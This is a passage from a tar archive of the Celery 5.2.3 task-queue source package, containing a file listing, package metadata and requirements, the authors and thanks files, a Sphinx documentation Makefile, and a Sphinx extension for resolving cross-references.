docs/internals/reference/celery.security.serialization.rst docs/internals/reference/celery.security.utils.rst docs/internals/reference/celery.utils.abstract.rst docs/internals/reference/celery.utils.collections.rst docs/internals/reference/celery.utils.deprecated.rst docs/internals/reference/celery.utils.dispatch.rst docs/internals/reference/celery.utils.dispatch.signal.rst docs/internals/reference/celery.utils.functional.rst docs/internals/reference/celery.utils.graph.rst docs/internals/reference/celery.utils.imports.rst docs/internals/reference/celery.utils.iso8601.rst docs/internals/reference/celery.utils.log.rst docs/internals/reference/celery.utils.nodenames.rst docs/internals/reference/celery.utils.objects.rst docs/internals/reference/celery.utils.rst docs/internals/reference/celery.utils.saferepr.rst docs/internals/reference/celery.utils.serialization.rst docs/internals/reference/celery.utils.sysinfo.rst docs/internals/reference/celery.utils.term.rst docs/internals/reference/celery.utils.text.rst docs/internals/reference/celery.utils.threads.rst docs/internals/reference/celery.utils.time.rst docs/internals/reference/celery.utils.timer2.rst docs/internals/reference/celery.worker.autoscale.rst docs/internals/reference/celery.worker.components.rst docs/internals/reference/celery.worker.control.rst docs/internals/reference/celery.worker.heartbeat.rst docs/internals/reference/celery.worker.loops.rst docs/internals/reference/celery.worker.pidbox.rst docs/internals/reference/index.rst docs/reference/celery.app.amqp.rst docs/reference/celery.app.autoretry.rst docs/reference/celery.app.backends.rst docs/reference/celery.app.builtins.rst docs/reference/celery.app.control.rst docs/reference/celery.app.defaults.rst docs/reference/celery.app.events.rst docs/reference/celery.app.log.rst docs/reference/celery.app.registry.rst docs/reference/celery.app.rst docs/reference/celery.app.task.rst docs/reference/celery.app.utils.rst docs/reference/celery.apps.beat.rst docs/reference/celery.apps.multi.rst docs/reference/celery.apps.worker.rst docs/reference/celery.beat.rst docs/reference/celery.bin.base.rst docs/reference/celery.bin.beat.rst docs/reference/celery.bin.call.rst docs/reference/celery.bin.celery.rst docs/reference/celery.bin.control.rst docs/reference/celery.bin.events.rst docs/reference/celery.bin.graph.rst docs/reference/celery.bin.list.rst docs/reference/celery.bin.logtool.rst docs/reference/celery.bin.migrate.rst docs/reference/celery.bin.multi.rst docs/reference/celery.bin.purge.rst docs/reference/celery.bin.result.rst docs/reference/celery.bin.shell.rst docs/reference/celery.bin.upgrade.rst docs/reference/celery.bin.worker.rst docs/reference/celery.bootsteps.rst docs/reference/celery.contrib.abortable.rst docs/reference/celery.contrib.migrate.rst docs/reference/celery.contrib.pytest.rst docs/reference/celery.contrib.rdb.rst docs/reference/celery.contrib.sphinx.rst docs/reference/celery.contrib.testing.app.rst docs/reference/celery.contrib.testing.manager.rst docs/reference/celery.contrib.testing.mocks.rst docs/reference/celery.contrib.testing.worker.rst docs/reference/celery.events.dispatcher.rst docs/reference/celery.events.event.rst docs/reference/celery.events.receiver.rst docs/reference/celery.events.rst docs/reference/celery.events.state.rst docs/reference/celery.exceptions.rst docs/reference/celery.loaders.app.rst docs/reference/celery.loaders.base.rst docs/reference/celery.loaders.default.rst docs/reference/celery.loaders.rst docs/reference/celery.result.rst docs/reference/celery.rst docs/reference/celery.schedules.rst docs/reference/celery.security.rst docs/reference/celery.signals.rst docs/reference/celery.states.rst docs/reference/celery.utils.debug.rst docs/reference/celery.worker.consumer.agent.rst docs/reference/celery.worker.consumer.connection.rst docs/reference/celery.worker.consumer.consumer.rst docs/reference/celery.worker.consumer.control.rst docs/reference/celery.worker.consumer.events.rst docs/reference/celery.worker.consumer.gossip.rst docs/reference/celery.worker.consumer.heart.rst docs/reference/celery.worker.consumer.mingle.rst docs/reference/celery.worker.consumer.rst docs/reference/celery.worker.consumer.tasks.rst docs/reference/celery.worker.request.rst docs/reference/celery.worker.rst docs/reference/celery.worker.state.rst docs/reference/celery.worker.strategy.rst docs/reference/celery.worker.worker.rst docs/reference/cli.rst docs/reference/index.rst docs/sec/CELERYSA-0001.txt docs/sec/CELERYSA-0002.txt docs/sec/CELERYSA-0003.txt docs/templates/readme.txt docs/tutorials/daemonizing.html docs/tutorials/debugging.html docs/tutorials/index.rst docs/tutorials/task-cookbook.rst docs/userguide/application.rst docs/userguide/calling.rst docs/userguide/canvas.rst docs/userguide/configuration.rst docs/userguide/daemonizing.rst docs/userguide/debugging.rst docs/userguide/extending.rst docs/userguide/index.rst docs/userguide/monitoring.rst docs/userguide/optimizing.rst docs/userguide/periodic-tasks.rst docs/userguide/routing.rst docs/userguide/security.rst docs/userguide/signals.rst docs/userguide/sphinx.rst docs/userguide/tasks.rst docs/userguide/testing.rst docs/userguide/workers.rst docs/userguide/concurrency/eventlet.rst docs/userguide/concurrency/index.rst examples/README.rst examples/app/myapp.py examples/celery_http_gateway/README.rst examples/celery_http_gateway/__init__.py examples/celery_http_gateway/manage.py examples/celery_http_gateway/settings.py examples/celery_http_gateway/tasks.py examples/celery_http_gateway/urls.py examples/django/README.rst examples/django/manage.py examples/django/requirements.txt examples/django/demoapp/__init__.py examples/django/demoapp/models.py examples/django/demoapp/tasks.py examples/django/demoapp/views.py examples/django/demoapp/migrations/0001_initial.py examples/django/demoapp/migrations/__init__.py examples/django/proj/__init__.py examples/django/proj/celery.py examples/django/proj/settings.py examples/django/proj/urls.py examples/django/proj/wsgi.py examples/eventlet/README.rst examples/eventlet/bulk_task_producer.py examples/eventlet/celeryconfig.py examples/eventlet/tasks.py examples/eventlet/webcrawler.py examples/gevent/celeryconfig.py examples/gevent/tasks.py examples/next-steps/setup.py examples/next-steps/proj/__init__.py examples/next-steps/proj/celery.py examples/next-steps/proj/tasks.py examples/periodic-tasks/myapp.py examples/resultgraph/tasks.py examples/security/mysecureapp.py examples/security/ssl/worker.key examples/security/ssl/worker.pem examples/tutorial/tasks.py extra/bash-completion/celery.bash extra/generic-init.d/celerybeat extra/generic-init.d/celeryd extra/macOS/org.celeryq.beat.plist extra/macOS/org.celeryq.worker.plist extra/supervisord/celery.sh extra/supervisord/celerybeat.conf extra/supervisord/celeryd.conf extra/supervisord/supervisord.conf extra/systemd/celery.conf extra/systemd/celery.service extra/systemd/celery.tmpfiles extra/systemd/celerybeat.service extra/zsh-completion/celery.zsh requirements/README.rst requirements/default.txt requirements/dev.txt requirements/docs.txt requirements/pkgutils.txt requirements/security.txt requirements/test-ci-base.txt requirements/test-ci-default.txt requirements/test-integration.txt requirements/test-pypy3.txt requirements/test.txt requirements/deps/mock.txt requirements/extras/arangodb.txt requirements/extras/auth.txt requirements/extras/azureblockblob.txt requirements/extras/brotli.txt requirements/extras/cassandra.txt requirements/extras/consul.txt requirements/extras/cosmosdbsql.txt requirements/extras/couchbase.txt requirements/extras/couchdb.txt requirements/extras/django.txt requirements/extras/dynamodb.txt requirements/extras/elasticsearch.txt requirements/extras/eventlet.txt requirements/extras/gevent.txt requirements/extras/librabbitmq.txt requirements/extras/memcache.txt requirements/extras/mongodb.txt requirements/extras/msgpack.txt requirements/extras/pymemcache.txt requirements/extras/pyro.txt requirements/extras/pytest.txt requirements/extras/redis.txt requirements/extras/s3.txt requirements/extras/slmq.txt requirements/extras/solar.txt requirements/extras/sphinxautobuild.txt requirements/extras/sqlalchemy.txt requirements/extras/sqs.txt requirements/extras/tblib.txt requirements/extras/thread.txt requirements/extras/yaml.txt requirements/extras/zeromq.txt requirements/extras/zookeeper.txt requirements/extras/zstd.txt t/__init__.py t/skip.py t/benchmarks/bench_worker.py t/integration/__init__.py t/integration/conftest.py t/integration/tasks.py t/integration/test_backend.py t/integration/test_canvas.py t/integration/test_inspect.py t/integration/test_security.py t/integration/test_tasks.py t/unit/__init__.py t/unit/conftest.py t/unit/test_canvas.py t/unit/app/__init__.py t/unit/app/test_amqp.py t/unit/app/test_annotations.py t/unit/app/test_app.py t/unit/app/test_backends.py t/unit/app/test_beat.py t/unit/app/test_builtins.py t/unit/app/test_celery.py t/unit/app/test_control.py t/unit/app/test_defaults.py t/unit/app/test_exceptions.py t/unit/app/test_loaders.py t/unit/app/test_log.py t/unit/app/test_registry.py t/unit/app/test_routes.py t/unit/app/test_schedules.py t/unit/app/test_utils.py t/unit/apps/__init__.py t/unit/apps/test_multi.py t/unit/backends/__init__.py t/unit/backends/test_arangodb.py t/unit/backends/test_asynchronous.py t/unit/backends/test_azureblockblob.py t/unit/backends/test_base.py t/unit/backends/test_cache.py t/unit/backends/test_cassandra.py t/unit/backends/test_consul.py t/unit/backends/test_cosmosdbsql.py t/unit/backends/test_couchbase.py t/unit/backends/test_couchdb.py t/unit/backends/test_database.py t/unit/backends/test_dynamodb.py t/unit/backends/test_elasticsearch.py t/unit/backends/test_filesystem.py t/unit/backends/test_mongodb.py t/unit/backends/test_redis.py t/unit/backends/test_rpc.py t/unit/backends/test_s3.py t/unit/bin/__init__.py t/unit/bin/celery.py t/unit/bin/test_multi.py t/unit/bin/proj/__init__.py t/unit/bin/proj/app.py t/unit/bin/proj/app2.py t/unit/concurrency/__init__.py t/unit/concurrency/test_concurrency.py t/unit/concurrency/test_eventlet.py t/unit/concurrency/test_gevent.py t/unit/concurrency/test_pool.py t/unit/concurrency/test_prefork.py t/unit/concurrency/test_solo.py t/unit/concurrency/test_thread.py t/unit/contrib/__init__.py t/unit/contrib/test_abortable.py t/unit/contrib/test_migrate.py t/unit/contrib/test_pytest.py t/unit/contrib/test_rdb.py t/unit/contrib/test_sphinx.py t/unit/contrib/proj/__init__.py t/unit/contrib/proj/conf.py t/unit/contrib/proj/contents.rst t/unit/contrib/proj/foo.py t/unit/contrib/proj/xyzzy.py t/unit/events/__init__.py t/unit/events/test_cursesmon.py t/unit/events/test_events.py t/unit/events/test_snapshot.py t/unit/events/test_state.py t/unit/fixups/__init__.py t/unit/fixups/test_django.py t/unit/security/__init__.py t/unit/security/case.py t/unit/security/test_certificate.py t/unit/security/test_key.py t/unit/security/test_security.py t/unit/security/test_serialization.py t/unit/tasks/__init__.py t/unit/tasks/test_canvas.py t/unit/tasks/test_chord.py t/unit/tasks/test_context.py t/unit/tasks/test_result.py t/unit/tasks/test_states.py t/unit/tasks/test_tasks.py t/unit/tasks/test_trace.py t/unit/tasks/unit_tasks.py t/unit/utils/__init__.py t/unit/utils/test_collections.py t/unit/utils/test_debug.py t/unit/utils/test_deprecated.py t/unit/utils/test_dispatcher.py t/unit/utils/test_functional.py t/unit/utils/test_graph.py t/unit/utils/test_imports.py t/unit/utils/test_local.py t/unit/utils/test_nodenames.py t/unit/utils/test_objects.py t/unit/utils/test_pickle.py t/unit/utils/test_platforms.py t/unit/utils/test_saferepr.py t/unit/utils/test_serialization.py t/unit/utils/test_sysinfo.py t/unit/utils/test_term.py t/unit/utils/test_text.py t/unit/utils/test_threads.py t/unit/utils/test_time.py t/unit/utils/test_timer2.py t/unit/utils/test_utils.py t/unit/worker/__init__.py t/unit/worker/test_autoscale.py t/unit/worker/test_bootsteps.py t/unit/worker/test_components.py t/unit/worker/test_consumer.py t/unit/worker/test_control.py t/unit/worker/test_heartbeat.py t/unit/worker/test_loops.py t/unit/worker/test_request.py t/unit/worker/test_revoke.py t/unit/worker/test_state.py t/unit/worker/test_strategy.py t/unit/worker/test_worker.py././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/dependency_links.txt0000664000175000017500000000000100000000000021720 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/entry_points.txt0000664000175000017500000000006100000000000021145 0ustar00asifasif00000000000000[console_scripts] celery = celery.__main__:main ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636334086.0 celery-5.2.3/celery.egg-info/not-zip-safe0000664000175000017500000000000100000000000020100 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/requires.txt0000664000175000017500000000263600000000000020261 0ustar00asifasif00000000000000pytz>=2021.3 billiard<4.0,>=3.6.4.0 kombu<6.0,>=5.2.3 vine<6.0,>=5.0.0 click<9.0,>=8.0.3 click-didyoumean>=0.0.3 click-repl>=0.2.0 click-plugins>=1.1.1 setuptools<59.7.0,>=59.1.1 [arangodb] pyArango>=1.3.2 [auth] cryptography [azureblockblob] azure-storage-blob==12.9.0 [brotli] [brotli:platform_python_implementation == "CPython"] brotli>=1.0.0 [brotli:platform_python_implementation == "PyPy"] brotlipy>=0.7.0 [cassandra] cassandra-driver<3.21.0 [consul] python-consul2 [cosmosdbsql] pydocumentdb==2.3.2 [couchbase] [couchbase:platform_python_implementation != "PyPy" and (platform_system != "Windows" or python_version < "3.10")] couchbase>=3.0.0 [couchdb] pycouchdb [django] Django>=1.11 [dynamodb] boto3>=1.9.178 [elasticsearch] elasticsearch [eventlet] [eventlet:python_version < "3.10"] eventlet>=0.32.0 [gevent] gevent>=1.5.0 [librabbitmq] librabbitmq>=1.5.0 [memcache] [memcache:platform_system != "Windows"] pylibmc [mongodb] pymongo[srv]>=3.11.1 [msgpack] msgpack [pymemcache] python-memcached [pyro] pyro4 [pytest] pytest-celery [redis] redis!=4.0.0,!=4.0.1,>=3.4.1 [s3] boto3>=1.9.125 [slmq] softlayer_messaging>=1.0.3 [solar] [solar:platform_python_implementation != "PyPy"] ephem [sqlalchemy] sqlalchemy [sqs] kombu[sqs] [tblib] [tblib:python_version < "3.8.0"] tblib>=1.3.0 [tblib:python_version >= "3.8.0"] tblib>=1.5.0 [yaml] PyYAML>=3.10 [zookeeper] kazoo>=1.3.1 [zstd] zstandard ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/top_level.txt0000664000175000017500000000000700000000000020401 0ustar00asifasif00000000000000celery ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/0000775000175000017500000000000000000000000013625 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/AUTHORS.txt0000664000175000017500000001225500000000000015520 0ustar00asifasif00000000000000========= AUTHORS ========= :order: sorted Aaron Ross Adam Endicott Adriano Petrich Akira Matsuzaki Alan Brogan Alec Clowes Ales Zoulek Allan Caffee Andrew McFague Andrew Watts Armin Ronacher Arpan Shah Ask Solem Augusto Becciu Balachandran C Bartosz Ptaszynski Ben Firshman Brad Jasper Branko Čibej Brendon Crawford Brian Bouterse Brian Rosner Bryan Berg Chase Seibert Chris Adams Chris Angove Chris Chamberlin Chris Rose Chris St. Pierre Chris Streeter Christoph Burgmer Christopher Peplin Clay Gerrard Dan McGee Daniel Hepper Daniel Lundin Daniel Watkins David Arthur David Cramer David Miller David Strauss David White Eran Rundstein Felix Berger Florian Apolloner Frédéric Junod Gert Van Gool Greg Haskins Greg Taylor Grégoire Cachet Gunnlaugur Thor Briem Hari Harm Verhagen Honza Kral Ian A Wilson Ignas Mikalajūnas Ionel Maries Cristian Ionut Turturica Iurii Kriachko Ivan Metzlar Jannis Leidel Jason Baker Jay McGrath Jeff Balogh Jeff Terrace Jerzy Kozera Jesper Noehr John Watson John Whitlock Jonas Haag Jonas Obrist Jonatan Heyman Joshua Ginsberg Juan Ignacio Catalano Juarez Bochi Jude Nagurney Julien Poissonnier Keith Perkins Kevin Tran Kornelijus Survila Leo Dirac Luis Clara Gomez Lukas Linhart Luke Zapart Marcin Kuźmiński Marcin Lulek Mark Hellewell Mark Lavin Mark Parncutt Mark Stover Mark Thurman Martin Galpin Martin Melin Matt Ullman Matt Williamson Matthew J Morrison Matthew Miller Mauro Rocco Maxim Bodyansky Mher Movsisyan Michael Elsdoerfer Michael Fladischer Miguel Hernandez Martos Mikhail Gusarov Mikhail Korobov Mitar Môshe van der Sterre Neil Chintomby Noah Kantrowitz Norman Richards Patrick Altman Peter Bittner Piotr Sikora Primož Kerin Remy Noel Reza Lotun Roberto Gaiser Roger Hu Rune Halvorsen Ryan P. Kelly Ryan Petrello Sam Cooke Sean Creeley Sean O'Connor Seong Won Mun Simon Josi Steeve Morin Stefan Kjartansson Steven Skoczen Tayfun Sen Thomas Johansson Thomas Forbes Timo Sugliani Travis Swicegood Vincent Driessen Vitaly Babiy Vladimir Kryachko Wes Turner Wes Winham Yury V. Zaytsev jpellerin kuno lookfwd sdcooke Łukasz Langa Łukasz Oleś ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/Makefile0000664000175000017500000001765700000000000015305 0ustar00asifasif00000000000000# Makefile for Sphinx documentation # # You can set these variables from the command line. SPHINXOPTS = SPHINXBUILD = sphinx-build PAPER = BUILDDIR = _build SOURCEDIR = . APP = /docs # Internal variables. PAPEROPT_a4 = -D latex_paper_size=a4 PAPEROPT_letter = -D latex_paper_size=letter ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . # the i18n builder cannot share the environment and doctrees with the others I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . .PHONY: help help: @echo "Please use \`make ' where is one of" @echo " html to make standalone HTML files" @echo " livehtml to start a local server hosting the docs" @echo " dirhtml to make HTML files named index.html in directories" @echo " singlehtml to make a single large HTML file" @echo " pickle to make pickle files" @echo " json to make JSON files" @echo " htmlhelp to make HTML files and a HTML help project" @echo " qthelp to make HTML files and a qthelp project" @echo " applehelp to make an Apple Help Book" @echo " devhelp to make HTML files and a Devhelp project" @echo " epub to make an epub" @echo " epub3 to make an epub3" @echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter" @echo " latexpdf to make LaTeX files and run them through pdflatex" @echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx" @echo " text to make text files" @echo " man to make manual pages" @echo " texinfo to make Texinfo files" @echo " info to make Texinfo files and run them through makeinfo" @echo " gettext to make PO message catalogs" @echo " changes to make an overview of all changed/added/deprecated items" @echo " xml to make Docutils-native XML files" @echo " pseudoxml to make pseudoxml-XML files for display purposes" @echo " linkcheck to check all external links for integrity" @echo " doctest to run all doctests embedded in the documentation (if enabled)" @echo " coverage to run coverage check of the documentation (if enabled)" @echo " apicheck to verify that all modules are present in autodoc" @echo " configcheck to verify that all modules are present in autodoc" @echo " spelling to perform a spell check" .PHONY: clean clean: rm -rf $(BUILDDIR)/* .PHONY: html html: $(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html @echo @echo "Build finished. The HTML pages are in $(BUILDDIR)/html." .PHONY: dirhtml dirhtml: $(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml @echo @echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml." .PHONY: singlehtml singlehtml: $(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml @echo @echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml." .PHONY: pickle pickle: $(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle @echo @echo "Build finished; now you can process the pickle files." .PHONY: json json: $(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json @echo @echo "Build finished; now you can process the JSON files." .PHONY: htmlhelp htmlhelp: $(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp @echo @echo "Build finished; now you can run HTML Help Workshop with the" \ ".hhp project file in $(BUILDDIR)/htmlhelp." .PHONY: qthelp qthelp: $(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp @echo @echo "Build finished; now you can run "qcollectiongenerator" with the" \ ".qhcp project file in $(BUILDDIR)/qthelp, like this:" @echo "# qcollectiongenerator $(BUILDDIR)/qthelp/PROJ.qhcp" @echo "To view the help file:" @echo "# assistant -collectionFile $(BUILDDIR)/qthelp/PROJ.qhc" .PHONY: applehelp applehelp: $(SPHINXBUILD) -b applehelp $(ALLSPHINXOPTS) $(BUILDDIR)/applehelp @echo @echo "Build finished. The help book is in $(BUILDDIR)/applehelp." @echo "N.B. You won't be able to view it unless you put it in" \ "~/Library/Documentation/Help or install it in your application" \ "bundle." .PHONY: devhelp devhelp: $(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp @echo @echo "Build finished." @echo "To view the help file:" @echo "# mkdir -p $$HOME/.local/share/devhelp/PROJ" @echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/PROJ" @echo "# devhelp" .PHONY: epub epub: $(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub @echo @echo "Build finished. The epub file is in $(BUILDDIR)/epub." .PHONY: epub3 epub3: $(SPHINXBUILD) -b epub3 $(ALLSPHINXOPTS) $(BUILDDIR)/epub3 @echo @echo "Build finished. The epub3 file is in $(BUILDDIR)/epub3." .PHONY: latex latex: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex @echo @echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex." @echo "Run \`make' in that directory to run these through (pdf)latex" \ "(use \`make latexpdf' here to do that automatically)." .PHONY: latexpdf latexpdf: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex @echo "Running LaTeX files through pdflatex..." $(MAKE) -C $(BUILDDIR)/latex all-pdf @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex." .PHONY: latexpdfja latexpdfja: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex @echo "Running LaTeX files through platex and dvipdfmx..." $(MAKE) -C $(BUILDDIR)/latex all-pdf-ja @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex." .PHONY: text text: $(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text @echo @echo "Build finished. The text files are in $(BUILDDIR)/text." .PHONY: man man: $(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man @echo @echo "Build finished. The manual pages are in $(BUILDDIR)/man." .PHONY: texinfo texinfo: $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo @echo @echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo." @echo "Run \`make' in that directory to run these through makeinfo" \ "(use \`make info' here to do that automatically)." .PHONY: info info: $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo @echo "Running Texinfo files through makeinfo..." make -C $(BUILDDIR)/texinfo info @echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo." .PHONY: gettext gettext: $(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale @echo @echo "Build finished. The message catalogs are in $(BUILDDIR)/locale." .PHONY: changes changes: $(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes @echo @echo "The overview file is in $(BUILDDIR)/changes." .PHONY: linkcheck linkcheck: $(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck @echo @echo "Link check complete; look for any errors in the above output " \ "or in $(BUILDDIR)/linkcheck/output.txt." .PHONY: doctest doctest: $(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest @echo "Testing of doctests in the sources finished, look at the " \ "results in $(BUILDDIR)/doctest/output.txt." .PHONY: coverage coverage: $(SPHINXBUILD) -b coverage $(ALLSPHINXOPTS) $(BUILDDIR)/coverage @echo "Testing of coverage in the sources finished, look at the " \ "results in $(BUILDDIR)/coverage/python.txt." .PHONY: apicheck apicheck: $(SPHINXBUILD) -b apicheck $(ALLSPHINXOPTS) $(BUILDDIR)/apicheck .PHONY: configcheck configcheck: $(SPHINXBUILD) -b configcheck $(ALLSPHINXOPTS) $(BUILDDIR)/configcheck .PHONY: spelling spelling: SPELLCHECK=1 $(SPHINXBUILD) -b spelling $(ALLSPHINXOPTS) $(BUILDDIR)/spelling .PHONY: xml xml: $(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml @echo @echo "Build finished. The XML files are in $(BUILDDIR)/xml." .PHONY: pseudoxml pseudoxml: $(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml @echo @echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml." .PHONY: livehtml livehtml: sphinx-autobuild -b html --host 0.0.0.0 --port 7000 --watch $(APP) -c . $(SOURCEDIR) $(BUILDDIR)/html././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/THANKS0000664000175000017500000000075600000000000014550 0ustar00asifasif00000000000000Thanks to Rune Halvorsen for the name. Thanks to Anton Tsigularov for the previous name (crunchy) that we had to abandon because of an existing project with that name. Thanks to Armin Ronacher for the Sphinx theme. Thanks to Brian K. Jones for bunny.py (https://github.com/bkjones/bunny), the tool that inspired 'celery amqp'. Thanks to Barry Pederson for amqplib (the project py-amqp forked). Thanks to Ty Wilkins for the Celery stalk logo (2016). ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/_ext/0000775000175000017500000000000000000000000014564 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_ext/celerydocs.py0000664000175000017500000001205400000000000017274 0ustar00asifasif00000000000000import typing from docutils import nodes from sphinx.errors import NoUri APPATTRS = { 'amqp': 'celery.app.amqp.AMQP', 'backend': 'celery.backends.base.BaseBackend', 'conf': 'celery.app.utils.Settings', 'control': 'celery.app.control.Control', 'events': 'celery.events.Events', 'loader': 'celery.app.loaders.base.BaseLoader', 'log': 'celery.app.log.Logging', 'pool': 'kombu.connection.ConnectionPool', 'tasks': 'celery.app.registry.Registry', 'AsyncResult': 'celery.result.AsyncResult', 'ResultSet': 'celery.result.ResultSet', 'GroupResult': 'celery.result.GroupResult', 'Worker': 'celery.apps.worker.Worker', 'WorkController': 'celery.worker.WorkController', 'Beat': 'celery.apps.beat.Beat', 'Task': 'celery.app.task.Task', 'signature': 'celery.canvas.Signature', } APPDIRECT = { 'on_configure', 'on_after_configure', 'on_after_finalize', 'set_current', 'set_default', 'close', 'on_init', 'start', 'worker_main', 'task', 'gen_task_name', 'finalize', 'add_defaults', 'config_from_object', 'config_from_envvar', 'config_from_cmdline', 'setup_security', 'autodiscover_tasks', 'send_task', 'connection', 'connection_or_acquire', 'producer_or_acquire', 'prepare_config', 'now', 'select_queues', 'either', 'bugreport', 'create_task_cls', 'subclass_with_self', 'annotations', 'current_task', 'oid', 'timezone', '__reduce_keys__', 'fixups', 'finalized', 'configured', 'add_periodic_task', 'autofinalize', 'steps', 'user_options', 'main', 'clock', } APPATTRS.update({x: f'celery.Celery.{x}' for x in APPDIRECT}) ABBRS = { 'Celery': 'celery.Celery', } ABBR_EMPTY = { 'exc': 'celery.exceptions', } DEFAULT_EMPTY = 'celery.Celery' def typeify(S, type): if type in ('meth', 'func'): return S + '()' return S def shorten(S, newtarget, src_dict): if S.startswith('@-'): return S[2:] elif S.startswith('@'): if src_dict is APPATTRS: return '.'.join(['app', S[1:]]) return S[1:] return S def get_abbr(pre, rest, type, orig=None): if pre: for d in APPATTRS, ABBRS: try: return d[pre], rest, d except KeyError: pass raise KeyError('Unknown abbreviation: {} ({})'.format( '.'.join([pre, rest]) if orig is None else orig, type, )) else: for d in APPATTRS, ABBRS: try: return d[rest], '', d except KeyError: pass return ABBR_EMPTY.get(type, DEFAULT_EMPTY), rest, ABBR_EMPTY def resolve(S, type): if '.' not in S: try: getattr(typing, S) except AttributeError: pass else: return f'typing.{S}', None orig = S if S.startswith('@'): S = S.lstrip('@-') try: pre, rest = S.split('.', 1) except ValueError: pre, rest = '', S target, rest, src = get_abbr(pre, rest, type, orig) return '.'.join([target, rest]) if rest else target, src return S, None def pkg_of(module_fqdn): return module_fqdn.split('.', 1)[0] def basename(module_fqdn): return module_fqdn.lstrip('@').rsplit('.', -1)[-1] def modify_textnode(T, newtarget, node, src_dict, type): src = node.children[0].rawsource return nodes.Text( (typeify(basename(T), type) if '~' in src else typeify(shorten(T, newtarget, src_dict), type)), src, ) def maybe_resolve_abbreviations(app, env, node, contnode): domainname = node.get('refdomain') target = node['reftarget'] type = node['reftype'] if target.startswith('@'): newtarget, src_dict = resolve(target, type) node['reftarget'] = newtarget # shorten text if '~' is not enabled. if len(contnode) and isinstance(contnode[0], nodes.Text): contnode[0] = modify_textnode(target, newtarget, node, src_dict, type) if domainname: try: domain = env.domains[node.get('refdomain')] except KeyError: raise NoUri try: return domain.resolve_xref(env, node['refdoc'], app.builder, type, newtarget, node, contnode) except KeyError: raise NoUri def setup(app): app.connect( 'missing-reference', maybe_resolve_abbreviations, ) app.add_crossref_type( directivename='sig', rolename='sig', indextemplate='pair: %s; sig', ) app.add_crossref_type( directivename='state', rolename='state', indextemplate='pair: %s; state', ) app.add_crossref_type( directivename='control', rolename='control', indextemplate='pair: %s; control', ) app.add_crossref_type( directivename='event', rolename='event', indextemplate='pair: %s; event', ) return { 'parallel_read_safe': True } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/_static/0000775000175000017500000000000000000000000015253 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_static/.keep0000664000175000017500000000000000000000000016166 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5477524 